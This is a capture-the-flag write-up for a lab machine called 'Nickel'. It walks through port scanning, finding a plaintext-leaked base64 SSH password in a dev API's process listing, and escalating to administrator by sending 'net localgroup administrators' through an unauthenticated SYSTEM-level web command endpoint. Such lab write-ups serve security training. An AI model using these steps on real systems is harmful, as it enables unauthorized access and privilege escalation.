# Nickel

## Gaining Access

Nmap scan:

```
$ nmap -p- --min-rate 4000 192.168.240.99     
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-07 14:39 +08
Nmap scan report for 192.168.240.99
Host is up (0.17s latency).
Not shown: 65518 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5040/tcp  open  unknown
7680/tcp  open  pando-pub
8089/tcp  open  unknown
33333/tcp open  dgi-serv
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
```

FTP doesn't accept anonymous logins and RDP is open for this machine.

### Web Enumeration -> User Creds

Port 80 was weird:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-4b1b5673a08f0bfc4ff958919228001e942e4923%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Port 8089 was slightly weirder:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-e7a846b75dfb5e0e7154be285849588ba9dc2a03%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Clicking on any of these would send requests to an IP address on port 33333:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-afffaa08e004a07026f8ea051e6d6f7bbf9238f2%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Meanwhile on port 33333, we needed a token of some sorts:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-38c302bad5811dbdfa9f5b1ccc919fd05fc19ec9%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

And this is all the information we have. I experimented with sending POST requests instead of GET requests, and it actually returned something from port 33333.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-43dc7996795380d844fa5d6fab2e77c8108d4ce6%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

This was different from the Not Found errors. I changed around the directory it sent requests to, and the `list-running-procs` returned something interesting:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-fbb8cce4dd09206aeebfdf9402a6ad7a7b5dfa84%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

If we scroll down, we can see this:

```
name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
              
$ echo 'Tm93aXNlU2xvb3BUaGVvcnkxMzkK' | base64 -d                                
NowiseSloopTheory139
```

This was a password for a user `ariah`, which works:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-fa970fd0dfbfd4cbaef273f058ab49cb7fa0ab10%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### FTP PDF -> Admin Shell

There was a `C:\ftp` directory that looked interesting:

```
 Directory of C:\ftp

09/01/2020  12:38 PM    <DIR>          .
09/01/2020  12:38 PM    <DIR>          ..
09/01/2020  11:02 AM            46,235 Infrastructure.pdf
```

We can transfer this back to our machine via `smbserver.py` and then view it.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-1d13bdc602452363f0e0d2f1793ec841357a9446%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

There was a temporary command point, and I enumerated it from the machine:

```
ariah@NICKEL C:\ftp>curl http://nickel/?whoami
<!doctype html><html><body>dev-api started at 2023-02-17T09:16:22

        <pre>nt authority\system
</pre>
</body></html>
```

It seems that we have a SYSTEM shell with this command endpoint. What we can do is just add `ariah` to the Administrators group.

```
ariah@NICKEL C:\ftp>curl http://nickel/?net%20localgroup%20administrators%20ariah%20/add     
<!doctype html><html><body>dev-api started at 2023-02-17T09:16:22

        <pre>The command completed successfully.

</pre>
</body></html>

ariah@NICKEL C:\ftp>net user ariah
User name                    ariah
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/1/2020 12:38:26 PM
Password expires             Never
Password changeable          9/1/2020 12:38:26 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/6/2023 11:56:18 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.
```

Then, we can relogin and view the flag:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-45aa5947cae6e317e54f007f70c83f96fe9b539a%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Rooted!